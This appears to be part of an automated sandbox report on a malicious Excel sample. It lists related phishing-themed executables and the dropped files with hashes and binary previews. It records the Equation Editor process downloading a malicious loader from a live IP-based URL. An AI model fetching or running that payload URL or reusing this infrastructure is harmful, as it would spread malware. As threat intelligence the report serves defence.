                                                                                                                                                            Confirmaci#U00f3n de pago.exeGet hashmaliciousBrowse
                                                                                                                                                            • 217.70.184.50
                                                                                                                                                            remittanceslip_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                            • 217.70.184.50
                                                                                                                                                            zMJhFzFNAz.exeGet hashmaliciousBrowse
                                                                                                                                                            • 217.70.184.50
                                                                                                                                                            Xi4vVgHekF.exeGet hashmaliciousBrowse
                                                                                                                                                            • 217.70.184.50
                                                                                                                                                            rcx41011_exe.exeGet hashmaliciousBrowse
                                                                                                                                                            • 217.70.184.50
                                                                                                                                                            WlBvCPCRcs.exeGet hashmaliciousBrowse
                                                                                                                                                            • 217.70.184.50
                                                                                                                                                            HwL7D1UcZG.exeGet hashmaliciousBrowse
                                                                                                                                                            • 217.70.184.50
                                                                                                                                                            CREDIT NOTE DEBIT NOTE 30.1.2021.xlsxGet hashmaliciousBrowse
                                                                                                                                                            • 217.70.184.50

                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                            No context

                                                                                                                                                            Dropped Files

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsoA180.tmp\System.dllNew Order PO2193570O1.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                              2320900000000.exeGet hashmaliciousBrowse
                                                                                                                                                                CshpH9OSkc.exeGet hashmaliciousBrowse
                                                                                                                                                                  5SXTKXCnqS.exeGet hashmaliciousBrowse
                                                                                                                                                                    i6xFULh8J5.exeGet hashmaliciousBrowse
                                                                                                                                                                      AWB00028487364 -000487449287.docGet hashmaliciousBrowse
                                                                                                                                                                        090049000009000.exeGet hashmaliciousBrowse
                                                                                                                                                                          dYy3yfSkwY.exeGet hashmaliciousBrowse
                                                                                                                                                                            PAYMENT 02.BHN-DK.2021 (PO#4500111226).xlsxGet hashmaliciousBrowse
                                                                                                                                                                              Purchase Order Price List 061021.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                Proforma Invoice and Bank swift-REG.PI-0086547654.exeGet hashmaliciousBrowse
                                                                                                                                                                                  UGGJ4NnzFz.exeGet hashmaliciousBrowse
                                                                                                                                                                                    Proforma Invoice and Bank swift-REG.PI-0086547654.exeGet hashmaliciousBrowse
                                                                                                                                                                                      3arZKnr21W.exeGet hashmaliciousBrowse
                                                                                                                                                                                        Shipping receipt.exeGet hashmaliciousBrowse
                                                                                                                                                                                          New Order TL273723734533.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                            YZ8OvkljWm.exeGet hashmaliciousBrowse
                                                                                                                                                                                              U03c2doc.exeGet hashmaliciousBrowse
                                                                                                                                                                                                QUOTE061021.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  PAYMENT CONFIRMATION.exeGet hashmaliciousBrowse

                                                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader1[1].exe
                                                                                                                                                                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):225177
                                                                                                                                                                                                    Entropy (8bit):7.913752075626111
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3072:DQIURTXJ+MwMy2ZeD0EUquupJDoeGgFq+HAgDtI7LXZ2sQYvvlIieO82WbyXVvE4:Ds9wMReDph9AOI7LXosQQBBFsuyQUvnk
                                                                                                                                                                                                    MD5:116E736BA00FCA4B8499C4DF00796454
                                                                                                                                                                                                    SHA1:A8D3D62DB4BD49E24C2BDA3D0D81C3BE25A81DAE
                                                                                                                                                                                                    SHA-256:096CA35528EF4F702E93F5F17D7954F26FB48ACD4526794CE1EE99D27CF1A4C3
                                                                                                                                                                                                    SHA-512:02DDAB82DD68FAA0627C15320DE3E0B118B1CC95FEE80FC013E57ED773A9420AF5B23F3BB7F9CCAC216C88581B665DB29BD1CA5E03F7E0B52F9C542D75B57F78
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 28%
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    IE Cache URL:http://192.210.173.40/files/loader1.exe
                                                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i..iw..iu..i...i..id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................................................................s.......................................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc................v..............@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1078C856.png
                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                    File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):84203
                                                                                                                                                                                                    Entropy (8bit):7.979766688932294
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                                                                                                                                                                                                    MD5:208FD40D2F72D9AED77A86A44782E9E2
                                                                                                                                                                                                    SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                                                                                                                                                                                                    SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                                                                                                                                                                                                    SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                                                                    Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\491F12AC.png
                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                    File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):51166
                                                                                                                                                                                                    Entropy (8bit):7.767050944061069
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                                                                                                                                                                                                    MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                                                                                                                                                                                                    SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                                                                                                                                                                                                    SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                                                                                                                                                                                                    SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                                                                    Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4FF7B8C5.png
                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                    File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):79394
                                                                                                                                                                                                    Entropy (8bit):7.864111100215953
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                                                                                                                                                                                    MD5:16925690E9B366EA60B610F517789AF1
                                                                                                                                                                                                    SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                                                                                                                                                                                    SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                                                                                                                                                                                    SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                                                                    Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\72F1B508.emf
                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):7608
                                                                                                                                                                                                    Entropy (8bit):5.091127811854214
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:+SDjyLSR5gs3iwiMO10VCVU7ckQadVDYM/PVfmhDqpH:5Djr+sW31RGtdVDYM3VfmkpH
                                                                                                                                                                                                    MD5:EB06F07412A815AED391F20298C1087B
                                                                                                                                                                                                    SHA1:AC0601FFC173F50B56C3AE2265C61B76711FBE01
                                                                                                                                                                                                    SHA-256:5CA81C391E8CA113254221D535BE4E0677908DA61DE0016EC963DD443F535FDE
                                                                                                                                                                                                    SHA-512:38AEF603FAC0AB6FB7159EBA5B48BD7E191A433739710AEACB11538E51ADA5E99CD724BE5B3886986FCBB02375B0C132B0C303AE8838602BCE88475DDD727A49
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: ....l...,...........<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I....................................................v.Ze..............%f^..................Y...Y.'.wq....\.....Y.......Y.@.Y.W.wq......Y..6.v_.wq......wq.Ze.4.g^..Y...f^0.g^......g^..f^........4.g^@.Y...f^......f^..........g^..Y.......g^4tf^..g^............<..u.Z.v.....Ze......Ze........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\865A705F.png
                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                    File Type:PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):50311
                                                                                                                                                                                                    Entropy (8bit):7.960958863022709
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
                                                                                                                                                                                                    MD5:4141C7515CE64FED13BE6D2BA33299AA
                                                                                                                                                                                                    SHA1:B290F533537A734B7030CE1269AC8C5398754194
                                                                                                                                                                                                    SHA-256:F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
                                                                                                                                                                                                    SHA-512:74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: .PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9A0C7C6E.jpeg
                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8815
                                                                                                                                                                                                    Entropy (8bit):7.944898651451431
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                                                                                                                                                                                    MD5:F06432656347B7042C803FE58F4043E1
                                                                                                                                                                                                    SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                                                                                                                                                                                    SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                                                                                                                                                                                    SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AAE4FF60.png
                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                    File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):84203
                                                                                                                                                                                                    Entropy (8bit):7.979766688932294
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                                                                                                                                                                                                    MD5:208FD40D2F72D9AED77A86A44782E9E2
                                                                                                                                                                                                    SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                                                                                                                                                                                                    SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                                                                                                                                                                                                    SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CE6FE002.png
                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                    File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):51166
                                                                                                                                                                                                    Entropy (8bit):7.767050944061069
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                                                                                                                                                                                                    MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                                                                                                                                                                                                    SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                                                                                                                                                                                                    SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                                                                                                                                                                                                    SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D22F6169.png
                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                    File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):49744
                                                                                                                                                                                                    Entropy (8bit):7.99056926749243
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                                                                                                                                                                                                    MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                                                                                                                                                                                                    SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                                                                                                                                                                                                    SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                                                                                                                                                                                                    SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D4A48ED4.jpeg
                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8815
                                                                                                                                                                                                    Entropy (8bit):7.944898651451431
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                                                                                                                                                                                    MD5:F06432656347B7042C803FE58F4043E1
                                                                                                                                                                                                    SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                                                                                                                                                                                    SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                                                                                                                                                                                    SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DBC137E1.png
                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                    File Type:PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):50311
                                                                                                                                                                                                    Entropy (8bit):7.960958863022709
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
                                                                                                                                                                                                    MD5:4141C7515CE64FED13BE6D2BA33299AA
                                                                                                                                                                                                    SHA1:B290F533537A734B7030CE1269AC8C5398754194
                                                                                                                                                                                                    SHA-256:F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
                                                                                                                                                                                                    SHA-512:74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
                                                                                                                                                                                                    Malicious:false
